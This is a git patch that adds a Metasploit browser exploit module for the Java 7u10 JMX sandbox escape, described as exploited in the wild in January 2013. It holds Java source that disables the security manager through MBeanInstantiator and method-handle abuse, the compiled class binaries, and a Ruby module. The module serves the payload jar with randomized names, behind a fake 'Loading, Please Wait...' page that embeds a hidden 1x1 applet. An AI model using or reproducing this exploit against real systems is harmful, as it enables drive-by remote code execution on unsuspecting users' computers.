From 876d889d820bc30d49ad6aa9f62902316af660c1 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Thu, 10 Jan 2013 20:30:43 +0100
Subject: [PATCH] added exploit for j7u10 0day

---
 data/exploits/j7u10_jmx/B.class               | Bin 0 -> 575 bytes
 data/exploits/j7u10_jmx/Exploit.class         | Bin 0 -> 3741 bytes
 external/source/exploits/j7u10_jmx/B.java     |  19 +++
 .../source/exploits/j7u10_jmx/Exploit.java    |  73 +++++++++++
 external/source/exploits/j7u10_jmx/Makefile   |  18 +++
 .../multi/browser/java_jre17_jmxbean.rb       | 122 ++++++++++++++++++
 6 files changed, 232 insertions(+)
 create mode 100755 data/exploits/j7u10_jmx/B.class
 create mode 100755 data/exploits/j7u10_jmx/Exploit.class
 create mode 100755 external/source/exploits/j7u10_jmx/B.java
 create mode 100755 external/source/exploits/j7u10_jmx/Exploit.java
 create mode 100644 external/source/exploits/j7u10_jmx/Makefile
 create mode 100644 modules/exploits/multi/browser/java_jre17_jmxbean.rb

diff --git a/data/exploits/j7u10_jmx/B.class b/data/exploits/j7u10_jmx/B.class
new file mode 100755
index 0000000000000000000000000000000000000000..ff4cee08d89c073747274041de26515fdac3d425
GIT binary patch
literal 575
zcmaix+fKqj5QhJOLbX=T;u+(Wg$sB9lmv)g;UU3byewryN=j>bAo4`s>Xk$jAHat)
zP74t=CT5eF-G64j+1Y*nczFX*#esqZG77TD$;c}xU_(Yx#-@xdLh{(OO}{~iYvmq6
zYC8i#NOw$ITm<93aIf{g#Y)@_Y(haRcSia|uUWc1tX=j;!tm<^rRxN)A<oP&Guf(!
zDJoX5Dq~y44t5FoW!dSyA?|$Bv1RP3*hh(wSw`nj0<{Q7k?aX0a7}+&yK>D5w-}1S
z7our|AVTS9X45c)=d~T%cOA<TE<qhQ%W}erHlO2vcKy$Zzg@UH^?WfV<UHYb7gs&k
zZG9NFEiL*)@AWHMFZXbWB>xUU=C6ve=Qm@k@TtK*#y(Yf232N=-8?|*Jh3Wqj*2+%
y);M0|dT^b@r%+efuk+%OBO9``hz+PTgY=5TEh8UUpA(d*PlgFuR#L3Tkp2X^YK1xg

literal 0
HcmV?d00001

diff --git a/data/exploits/j7u10_jmx/Exploit.class b/data/exploits/j7u10_jmx/Exploit.class
new file mode 100755
index 0000000000000000000000000000000000000000..1fb9416e3f4debb4e51605cd255ac8d031dbe568
GIT binary patch
literal 3741
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
Nt<aoHzluMH_CJ5R{wM$d

literal 0
HcmV?d00001

diff --git a/external/source/exploits/j7u10_jmx/B.java b/external/source/exploits/j7u10_jmx/B.java
new file mode 100755
index 0000000000..fec2767060
--- /dev/null
+++ b/external/source/exploits/j7u10_jmx/B.java
@@ -0,0 +1,19 @@
+import java.security.AccessController;
+import java.security.PrivilegedExceptionAction;
+
+public class B
+  implements PrivilegedExceptionAction
+{
+  public B()
+  {
+    try
+    {
+      AccessController.doPrivileged(this); } catch (Exception e) {
+    }
+  }
+
+  public Object run() {
+    System.setSecurityManager(null);
+    return new Object();
+  }
+}
diff --git a/external/source/exploits/j7u10_jmx/Exploit.java b/external/source/exploits/j7u10_jmx/Exploit.java
new file mode 100755
index 0000000000..f35c8ee469
--- /dev/null
+++ b/external/source/exploits/j7u10_jmx/Exploit.java
@@ -0,0 +1,73 @@
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.ObjectInputStream;
+import java.io.ObjectOutputStream;
+import metasploit.Payload;
+import java.lang.Runtime;
+import java.applet.Applet;
+import com.sun.jmx.mbeanserver.JmxMBeanServer;
+import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder;
+import com.sun.jmx.mbeanserver.MBeanInstantiator;
+import java.lang.invoke.MethodHandle;
+import java.lang.invoke.MethodHandles;
+import java.lang.invoke.MethodType;
+import java.lang.reflect.Method;
+
+
+public class Exploit extends Applet
+{
+
+    public Exploit()
+    {
+    }
+    
+
+    public void init()
+    {
+        try
+        {
+			ByteArrayOutputStream bos = new ByteArrayOutputStream();
+			byte[] buffer = new byte[8192];
+			int length;
+
+			// read in the class file from the jar
+			InputStream is = getClass().getResourceAsStream("B.class");
+			// and write it out to the byte array stream
+			while( ( length = is.read( buffer ) ) > 0 )
+				bos.write( buffer, 0, length );
+			// convert it to a simple byte array
+			buffer = bos.toByteArray();			
+			
+			JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder();
+			JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null);
+			MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator();
+			ClassLoader a = null;
+			Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a);
+			Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a);
+			MethodHandles.Lookup localLookup = MethodHandles.publicLookup();
+			MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
+			MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
+			MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
+			MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
+			Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
+			MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
+			MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
+			MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
+			MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
+			Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
+			MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
+			MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
+			Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
+			localClass3.newInstance();
+			
+            Payload.main(null);
+            //Runtime.getRuntime().exec("calc.exe");
+        }
+        catch(Throwable ex)
+        {
+            //exception.printStackTrace();
+        }
+    }
+
+}
diff --git a/external/source/exploits/j7u10_jmx/Makefile b/external/source/exploits/j7u10_jmx/Makefile
new file mode 100644
index 0000000000..3fa70edee3
--- /dev/null
+++ b/external/source/exploits/j7u10_jmx/Makefile
@@ -0,0 +1,18 @@
+# rt.jar must be in the classpath!
+
+CLASSES = \
+	Exploit.java  \
+	B.java
+
+.SUFFIXES: .java .class
+.java.class:
+	javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+	mv Exploit.class ../../../../data/exploits/j7u10_jmx/
+	mv B.class ../../../../data/exploits/j7u10_jmx/
+
+clean:
+	rm -rf *.class
diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean.rb b/modules/exploits/multi/browser/java_jre17_jmxbean.rb
new file mode 100644
index 0000000000..b1e21a9f21
--- /dev/null
+++ b/modules/exploits/multi/browser/java_jre17_jmxbean.rb
@@ -0,0 +1,122 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+	include Msf::Exploit::EXE
+
+	include Msf::Exploit::Remote::BrowserAutopwn
+	autopwn_info({ :javascript => false })
+
+	def initialize( info = {} )
+
+		super( update_info( info,
+			'Name'          => 'Java Applet JMX Remote Code Execution',
+			'Description'   => %q{
+					This module abuses the JMX classes from a Java Applet to run arbitrary Java
+				code outside of the sandbox as exploited in the wild in January of 2013. The
+				vulnerability affects Java version 7u10 and earlier.
+			},
+			'License'       => MSF_LICENSE,
+			'Author'        => [ 'egypt', 'sinn3r', 'juan vazquez' ],
+			'References'    => [
+				[ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
+				[ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ]
+			],
+			'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
+			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+			'Targets'       =>
+				[
+					[ 'Generic (Java Payload)',
+						{
+							'Platform' => ['java'],
+							'Arch' => ARCH_JAVA,
+						}
+					],
+					[ 'Windows x86 (Native Payload)',
+						{
+							'Platform' => 'win',
+							'Arch' => ARCH_X86,
+						}
+					],
+					[ 'Mac OS X x86 (Native Payload)',
+						{
+							'Platform' => 'osx',
+							'Arch' => ARCH_X86,
+						}
+					],
+					[ 'Linux x86 (Native Payload)',
+						{
+							'Platform' => 'linux',
+							'Arch' => ARCH_X86,
+						}
+					],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Jan 10 2013'
+			))
+	end
+
+
+	def setup
+		path = File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "Exploit.class")
+		@exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+		path = File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "B.class")
+		@loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+
+		@exploit_class_name = rand_text_alpha("Exploit".length)
+		@exploit_class.gsub!("Exploit", @exploit_class_name)
+		super
+	end
+
+	def on_request_uri(cli, request)
+		print_status("handling request for #{request.uri}")
+
+		case request.uri
+		when /\.jar$/i
+			jar = payload.encoded_jar
+			jar.add_file("#{@exploit_class_name}.class", @exploit_class)
+			jar.add_file("B.class", @loader_class)
+			metasploit_str = rand_text_alpha("metasploit".length)
+			payload_str = rand_text_alpha("payload".length)
+			jar.entries.each { |entry|
+				entry.name.gsub!("metasploit", metasploit_str)
+				entry.name.gsub!("Payload", payload_str)
+				entry.data = entry.data.gsub("metasploit", metasploit_str)
+				entry.data = entry.data.gsub("Payload", payload_str)
+			}
+			jar.build_manifest
+
+			send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
+		when /\/$/
+			payload = regenerate_payload(cli)
+			if not payload
+				print_error("Failed to generate the payload.")
+				send_not_found(cli)
+				return
+			end
+			send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
+		else
+			send_redirect(cli, get_resource() + '/', '')
+		end
+
+	end
+
+	def generate_html
+		html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
+		html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
+		html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">|
+		html += %Q|</applet></body></html>|
+		return html
+	end
+
+end